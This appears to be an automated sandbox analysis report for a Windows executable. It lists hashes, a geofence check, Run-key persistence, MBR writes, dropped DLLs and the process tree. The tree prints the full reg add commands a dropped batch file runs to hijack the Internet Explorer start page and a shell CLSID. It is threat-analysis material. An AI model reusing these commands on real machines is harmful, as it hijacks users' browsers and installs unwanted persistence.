Analysis
-
max time kernel
135s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
03-10-2022 11:48
Static task
static1
Behavioral task
behavioral1
Sample
e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe
Resource
win10v2004-20220812-en
General
-
Target
e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe
-
Size
281KB
-
MD5
4885173ebfa2267b9906d45bc6a2d2e0
-
SHA1
38687ac8894e2401315c6626ec57a3d0fcae8b9e
-
SHA256
e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795
-
SHA512
e398c05009f16e66a6425f924e5b82dd2f3e31be44fe2564b444ff3f8e8f65bb567a458d759df57bb91e373449b6ae6a2adf841ee33918218d9d7505cb6cd5cf
-
SSDEEP
6144:Te34l9w0oHtBuAbJ8zk2OXp8TqPcv8h4SKEumqQI:0HSjzxgpiqP1/KEnqQI
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe -
Loads dropped DLL 6 IoCs
Processes:
e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exepid process 4116 e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe 4116 e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe 4116 e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe 4116 e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe 4116 e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe 4116 e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\shandian = "C:\\Program Files (x86)\\shandian\\shandian.exe" e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exedescription ioc process File opened for modification \??\PhysicalDrive0 e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe -
Drops file in Program Files directory 6 IoCs
Processes:
e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exedescription ioc process File created C:\Program Files (x86)\shandian\home.bat e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe File created C:\Program Files (x86)\shandian\ico\360.ico e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe File created C:\Program Files (x86)\shandian\ico\anquan.ico e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe File created C:\Program Files (x86)\shandian\ico\ie.ico e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe File created C:\Program Files (x86)\shandian\ico\taobao.ico e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe File opened for modification C:\Program Files (x86)\shandian\config.ini e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main reg.exe -
Modifies Internet Explorer start page 1 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "http://www.jlbnh.com/?tn 4" reg.exe -
Modifies registry class 5 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage reg.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.execmd.exedescription pid process target process PID 4116 wrote to memory of 344 4116 e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe cmd.exe PID 4116 wrote to memory of 344 4116 e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe cmd.exe PID 4116 wrote to memory of 344 4116 e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe cmd.exe PID 344 wrote to memory of 1060 344 cmd.exe reg.exe PID 344 wrote to memory of 1060 344 cmd.exe reg.exe PID 344 wrote to memory of 1060 344 cmd.exe reg.exe PID 344 wrote to memory of 2636 344 cmd.exe reg.exe PID 344 wrote to memory of 2636 344 cmd.exe reg.exe PID 344 wrote to memory of 2636 344 cmd.exe reg.exe PID 344 wrote to memory of 1672 344 cmd.exe reg.exe PID 344 wrote to memory of 1672 344 cmd.exe reg.exe PID 344 wrote to memory of 1672 344 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe"C:\Users\Admin\AppData\Local\Temp\e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Adds Run key to start application
- Writes to the Master Boot Record (MBR)
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\shandian\home.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKCR\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command" /v "" /t reg_expand_sz /d "C:\Program Files\Internet Explorer\iexplore.exe http://www.jlbnh.com/?tn 4" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\SOFTWARE\Policies\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.jlbnh.com/?tn 4" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.jlbnh.com/?tn 4" /f3⤵
- Modifies Internet Explorer settings
- Modifies Internet Explorer start page
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\shandian\home.batFilesize
703B
MD59b86748bf8bcfc00712942d6285d49a2
SHA106a20159bdb81e5501e7c65f2e8c75b142916090
SHA25607943cb2547088ed5ce1b349010d47f6b98b0a52e2aa9de6ae8fee98929b2753
SHA51234d3f5a659a69bfdc4b6df04c09a14d70b3342ab3023aebc8d5b67aa389b47ea01bafab569da3ba396e09d9a08e5a1bc66611e13b0c329e7bb6fa96c0ae643a9
-
C:\Users\Admin\AppData\Local\Temp\nsv717C.tmp\Md5dll.dllFilesize
8KB
MD5a7d710e78711d5ab90e4792763241754
SHA1f31cecd926c5d497aba163a17b75975ec34beb13
SHA2569b05dd603f13c196f3f21c43f48834208fed2294f7090fcd1334931014611fb2
SHA512f0ca2d6f9a8aeac84ef8b051154a041adffc46e3e9aced142e9c7bf5f7272b047e1db421d38cb2d9182d7442bee3dd806618b019ec042a23ae0e71671d2943c0
-
C:\Users\Admin\AppData\Local\Temp\nsv717C.tmp\Md5dll.dllFilesize
8KB
MD5a7d710e78711d5ab90e4792763241754
SHA1f31cecd926c5d497aba163a17b75975ec34beb13
SHA2569b05dd603f13c196f3f21c43f48834208fed2294f7090fcd1334931014611fb2
SHA512f0ca2d6f9a8aeac84ef8b051154a041adffc46e3e9aced142e9c7bf5f7272b047e1db421d38cb2d9182d7442bee3dd806618b019ec042a23ae0e71671d2943c0
-
C:\Users\Admin\AppData\Local\Temp\nsv717C.tmp\System.dllFilesize
11KB
MD500a0194c20ee912257df53bfe258ee4a
SHA1d7b4e319bc5119024690dc8230b9cc919b1b86b2
SHA256dc4da2ccadb11099076926b02764b2b44ad8f97cd32337421a4cc21a3f5448f3
SHA5123b38a2c17996c3b77ebf7b858a6c37415615e756792132878d8eddbd13cb06710b7da0e8b58104768f8e475fc93e8b44b3b1ab6f70ddf52edee111aaf5ef5667
-
C:\Users\Admin\AppData\Local\Temp\nsv717C.tmp\bind.dllFilesize
71KB
MD5e2b78c96162ad8c36a623e6a4ba1c216
SHA1768b7bd184f2424099b964b2c9b68ef7fc8792dd
SHA256ac615795d598b1c07aecd00e877c89abf71caa4d7d479cfab2d847f238f599cf
SHA512f1d4cc27d44ecc7c5ef178972504637f42326e573a58fac2d918160a267e51b6123d627f324ce952e748242f5b13e4760089fc16d221229a93854124aa405fac
-
C:\Users\Admin\AppData\Local\Temp\nsv717C.tmp\xID.dllFilesize
9KB
MD53a5ed71aa9c6846d95d57235c4c443d7
SHA108156d29bed654f8f8d7f46ddbce84d22d4710cf
SHA2565e3fa4d610cb2d80ed9991cb2562bd70c5b4d49dbcf4e42a1017c59eedbe28a4
SHA5125cdb5059020c20a83f230ae2d75bfb6fd69a03418ba6407336db9f0c653fea1e8f4a51400812da81a8bde2f6e4d95fd80e29eb462e818ddbd881789c00d5d1d1
-
C:\Users\Admin\AppData\Local\Temp\nsv717C.tmp\xID.dllFilesize
9KB
MD53a5ed71aa9c6846d95d57235c4c443d7
SHA108156d29bed654f8f8d7f46ddbce84d22d4710cf
SHA2565e3fa4d610cb2d80ed9991cb2562bd70c5b4d49dbcf4e42a1017c59eedbe28a4
SHA5125cdb5059020c20a83f230ae2d75bfb6fd69a03418ba6407336db9f0c653fea1e8f4a51400812da81a8bde2f6e4d95fd80e29eb462e818ddbd881789c00d5d1d1
-
memory/344-138-0x0000000000000000-mapping.dmp
-
memory/1060-140-0x0000000000000000-mapping.dmp
-
memory/1672-142-0x0000000000000000-mapping.dmp
-
memory/2636-141-0x0000000000000000-mapping.dmp